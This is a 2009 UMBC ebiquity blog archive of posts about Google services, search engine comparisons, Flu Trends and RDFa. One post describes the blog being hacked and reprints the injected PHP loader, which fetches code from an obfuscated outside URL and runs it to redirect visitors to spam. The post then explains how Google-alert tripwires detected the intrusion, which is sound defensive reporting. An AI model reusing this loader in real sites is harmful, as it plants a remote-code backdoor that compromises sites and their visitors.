UMBC ebiquity
Google

Archive for the 'Google' Category

Google Reader gets more social

July 16th, 2009, by Tim Finin, posted in Google, Social media

The most frequent complaint about facebook I’ve seen is that it provides a button to show you like an item, but not one for dislike. Google Reader recently added new social features the ability for users to mare a post as liked but it also doesn’t allow you to indicate your dislike. You can unlike an item that you previously had liked, but that just gets you back to a neutral stance.

Google Reader gets more social

It’s probably a prudent choice, aimed at keeping things civil. But there are two schools of thought about the old adage “If you don’t have anything nice to say about someone …”, one of which ends with “come sit next to me.”.

The first time you like a post on Google Reader it warns you that it’s a public act. Indeed, clicking on the “N people liked this” link at the top of a post in Reader shows you the Google names of readers who liked it. You can click through to their Google profiles or to see a list of other liked and shared items. Public indeed! At least on facebook your likes are visible only to people who can see the corresponding item.

I think Google Reader’s new social features look like they might be useful, but time will tell.

Google is from Mars, Facebook is from Venus

June 23rd, 2009, by Tim Finin, posted in Google, Social media

Wired has an interesting article on Facebook vs. Google, Great Wall of Facebook: The Social Network’s Plan to Dominate the Internet — and Keep Google Out.

“Today, the Google-Facebook rivalry isn’t just going strong, it has evolved into a full-blown battle over the future of the Internet—its structure, design, and utility. For the last decade or so, the Web has been defined by Google’s algorithms—rigorous and efficient equations that parse practically every byte of online activity to build a dispassionate atlas of the online world. Facebook CEO Mark Zuckerberg envisions a more personalized, humanized Web, where our network of friends, colleagues, peers, and family is our primary source of information, just as it is offline. In Zuckerberg’s vision, users will query this “social graph” to find a doctor, the best camera, or someone to hire—rather than tapping the cold mathematics of a Google search. It is a complete rethinking of how we navigate the online world, one that places Facebook right at the center. In other words, right where Google is now.”

This is definitely a David and Goliath match, what with Facebook not having turned a profit yet. The article does a good job of pointing out how their services are different and complement one another.

At the risk of evoking discredited stereotypes, maybe Google is from Mars and Facebook is from Venus.

BlindSearch evaluates Google, Bing and Yahoo search engines

June 7th, 2009, by Tim Finin, posted in Google, sEARCH, Web

Who’s got the best basic web search engine? One way to approach that question is to conduct an experiment in which subjects rank the results returned by several engines without knowing which is which.

BlindSearch is a simple and neat site that collects ‘objective’ opinions on search quality by showing query results from Google, Yahoo and Bing side by side without identifying which is which and inviting you to select the best.

“Type in a search query above, hit search then vote for the column which you believe best matches your query. The columns are randomised with every query.

The goal of this site is simple, we want to see what happens when you remove the branding from search engines. How differently will you perceive the results?”


BlindSearch evaluates Google, Bing and Yahoo

As of this writing there have been 1679 votes for preferred results with Google getting 39%, Bing 39% and Yahoo: 22%.

update 2:14pm edt 6/7: Google: 45%, Bing: 32%, Yahoo: 22% | 11,130 votes

Google Chrome for Linux and Mac

June 5th, 2009, by Tim Finin, posted in Google, sEARCH, Web

How’s this for truth in advertising. The Chromium blog announces beta versions of Google Chrome for MAC OS X and Linus, but warns people not to try them in a post Danger: Mac and Linux builds available.

“In order to get more feedback from developers, we have early developer channel versions of Google Chrome for Mac OS X and Linux, but whatever you do, please DON’T DOWNLOAD THEM! Unless of course you are a developer or take great pleasure in incomplete, unpredictable, and potentially crashing software. How incomplete? So incomplete that, among other things, you won’t yet be able to view YouTube videos, change your privacy settings, set your default search provider, or even print.”

Of course, they know that this will make trying them irresistible to some of us. If that includes you, go get the Mac or Linux version.

Bing vs. Google, side by side comparison

June 1st, 2009, by Tim Finin, posted in Google, sEARCH, Security, Semantic Web, Social media

Microsoft’s new Bing search engine is getting a lot of interest. Glenn McDonald posts about a nice side-by-side Bing vs Google comparator tat he developed. It makes it easy to compare how the two services do on a range of different types of searches. Here are the ones that Glen said he found useful in developing his initial opinion.

I sense form some of these queries that he is probing the systems where an advanced search engine can exploit a little bit of semantic knowledge. For example, recognizing that a user’s query “boston to asheville” matches a common pattern “ to “, and she probably is interested in information about how to travel from the first location tot he second. It seems like Google has been working on adding more such patterns, at least for the low hanging fruit.

Of course, if everyone hits on this site it may get throttled or blocked by either or both of the search engines. @Glen — would you be willing to share your code?

(spotted on hacker news)

Google Wave as a new communication model

May 28th, 2009, by Tim Finin, posted in Agents, Google, Semantic Web, Social media

Google wave looks interesting. Google describes it as “a new tool for communication and collaboration on the web” and it’s a funny mix of email, instant messaging, wikis, and Facebook wall interactions. Or maybe IRC for the new century. This is from a post, Went Walkabout. Brought back Google Wave, on the Google blog.

“A “wave” is equal parts conversation and document, where people can communicate and work together with richly formatted text, photos, videos, maps, and more. Here’s how it works: In Google Wave you create a wave and add people to it. Everyone on your wave can use richly formatted text, photos, gadgets, and even feeds from other sources on the web. They can insert a reply or edit the wave directly. It’s concurrent rich-text editing, where you see on your screen nearly instantly what your fellow collaborators are typing in your wave. That means Google Wave is just as well suited for quick messages as for persistent content — it allows for both collaboration and communication. You can also use “playback” to rewind the wave and see how it evolved.”

Google Wave is not available yet, but you can sign up to be notified when it’s launched.

Here’s a random thought. Our models for communication in multiagent systems (e.g., KQML and FIPA) were informed by if not based on email and, to a lesser degree, IM. If Wave is a useful new communication model for humans, does it have a counterpart for software agents? If so, I suspect that ideas from the Semantic Web will be useful to provide a “rich content” for agents.

For more views, see posts by o’reilly, techcrunch, BusinessWeek and Gabor Cselle.

Ebiquity Google alert tripwires triggered

May 21st, 2009, by Tim Finin, posted in Ebiquity, Google, Security, splog

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like http://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)

We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
  • viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.


Google alert for a hacked website

The results of this Google search reveal many compromised blogs from the .edu domain.

Google supports RDFa and Microformats

May 12th, 2009, by Tim Finin, posted in Google, RDF, Semantic Web

Google has announced that it will begin to recognize structured information encoded as metadata in either RDFa and in Microformats and use the metadata in search results snippets for reviews and people.

“Structured data makes the web a better place. It also helps Google better understand and present your page in search results. … Google’s first use of this data will be in search results snippets for two kinds of objects: Reviews and People. Providing more detail in search results helps users to understand the value of your pages. When users get more information showing how your page is relevant to their search, they’re more likely to click through to see the full page. … At Google, we believe in openness, so we are using two open standards to allow you to annotate structured data on your site: microformats and RDFa. Both standards allow markup of information on your pages.”

This is a case where Google is following Yahoo, which announced more general support for RDFa and microformats last Fall in their Search Monkey.

We expect that this is work in progress. While it’s great that Google is supporting RDFa annotations, they are asking people to start with the new RDF vocabulary defined at their site http://www.data-vocabulary.org/ rather than reusing or integrating with existing, widely used vocabularies. Let’s hope that they embrace the LOD vision in the near future.

Storms on Planet Social Media Research

May 7th, 2009, by Tim Finin, posted in Google, Social media, splog

We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around I discovered that our server is unable to access any feeds that resolve to Feedburner.

Apparently Feedburner has a blacklist of IP addresses that it blocks and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. ( I was to get our own blog back onto Planet SMR because I reconfigured the system to revert to the old, non-Feedburner feed.)

We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour and only about ten of our feeds resolve to feedburner.

My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.

One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users and also be a good steward of the the Web environment by blocking suspected web spammers from the feeds hosted by Feedburner.

So, my guess is that the Google thinks that the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR. We also do not host any ads, which is a motivation for most splogs.

If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then there will be many other legitimate feed aggregator sites that have or soon will have this problem.

By the way — we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us as planet-smr at cs.umbc.edu.

update 5/8: We’ve identified and solved the problem, thanks to Google Freebase ‘community expert’ Franklin Tse. The problem was due to our having an old entry for the freebase IP address in the server’s /etc/hosts table. I think we added when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget and come back to bite you.

Google flu trends for Mexico

April 30th, 2009, by Tim Finin, posted in Google, Social media

Google has produced a special Mexico Flu Trends page to aggregate flu-related search queries from users in Mexico and various states within Mexico.

“We’ve created experimental estimates of flu activity in Mexico using aggregated search data. Unlike Google Flu Trends for U.S., this data has not been validated against confirmed cases of flu. After conferring with US and Mexican health officials, we’ve decided to share these initial results to provide additional information on the evolving epidemic.”

An article in the New York Times, To Aid Mexico, Google Expands Flu Tracking, quotes one expert on the limitations of the Google data

Dr. Henry L. Niman, a biochemist in Pittsburgh who runs Recombinomics, a Web site that tracks the genetics of flu cases worldwide, said that Google’s service appeared to provide only limited advance warning. “I am not saying that it is not useful. It probably works to complement other sources of surveillance and data,” he said.

Google flu trends: Web searches as sensors

April 26th, 2009, by Tim Finin, posted in Google, sEARCH, Semantic Web, Social media

Google has had a special “flu trends” site up for many months that provides “up-to-date estimates of flu activity in the United States based on aggregated search queries.”

They have found that how many people search for flu-related topics is a leading indicator for reports on how many people actually have flu symptoms. They believe that this metric “may indicate flu activity up to two weeks ahead of traditional flu surveillance systems”. Click on the flash video below to see the relationship between the flu searches and flu symptoms.

So, is Google magic? The explanation for why changes in in the level of flu searches precedes changes in the level of flu symptoms is more mundane.

“So why bother with estimates from aggregated search queries? It turns out that traditional flu surveillance systems take 1-2 weeks to collect and release surveillance data, but Google search queries can be automatically counted very quickly. By making our flu estimates available each day, Google Flu Trends may provide an early-warning system for outbreaks of influenza.”

You can get the details in a recent article in nature:

J. Ginsberg, M. Mohebbi, R. Patel, L. Brammer, M. Smolinski and L. Brilliant, Detecting influenza epidemics using search engine query data, Nature 457, 1012-1014 (19 February 2009).

Of course, such leading indicators may not correlate well if there is a “black swan” flu epidemic or even if there is an unfounded fear of one. Sometimes the crowds are wise, but often not. Remember when we all thought technology stocks real estate was a good thing to invest in?

The Google site also allows you to look at the data by state as well. Click on the image below to try it out.



Cloudera offers a simpler Hadoop distribution

March 18th, 2009, by Tim Finin, posted in cloud computing, Google, High performance computing, MC2, Multicore Computation Center, Semantic Web, Social media

We are early in the era of big data (including social and/or semantic) and more and more of us need the tools to handle it. Monday’s NYT had a story, Hadoop, a Free Software Program, Finds Uses Beyond Search, on Hadoop and Cloudera, a new startup that offering its own Hadoop distribution that is designed to beasier to install and configure.

“In the span of just a couple of years, Hadoop, a free software program named after a toy elephant, has taken over some of the world’s biggest Web sites. It controls the top search engines and determines the ads displayed next to the results. It decides what people see on Yahoo’s homepage and finds long-lost friends on Facebook.”

Three top engineers from Google, Yahoo and Facebook, along with a former executive from Oracle, are betting it will. They announced a start-up Monday called Cloudera, based in Burlingame, Calif., that will try to bring Hadoop’s capabilities to industries as far afield as genomics, retailing and finance. The company has just released its own version of Hadoop. The software remains free, but Cloudera hopes to make money selling support and consulting services for the software. It has only a few customers, but it wants to attract biotech, oil and gas, retail and insurance customers to the idea of making more out of their information for less.

Cloudera’s distribution, curently based on Hadoop v0.18.3, uses RPM and comes with a Web-based configuration aide. The company also offers some free basic training in mapReduce concepts, using Hadoop, developing appropriate algorithms and using Hive.

You are currently browsing the archives for the Google category.

  Home | Archive | Login | Feed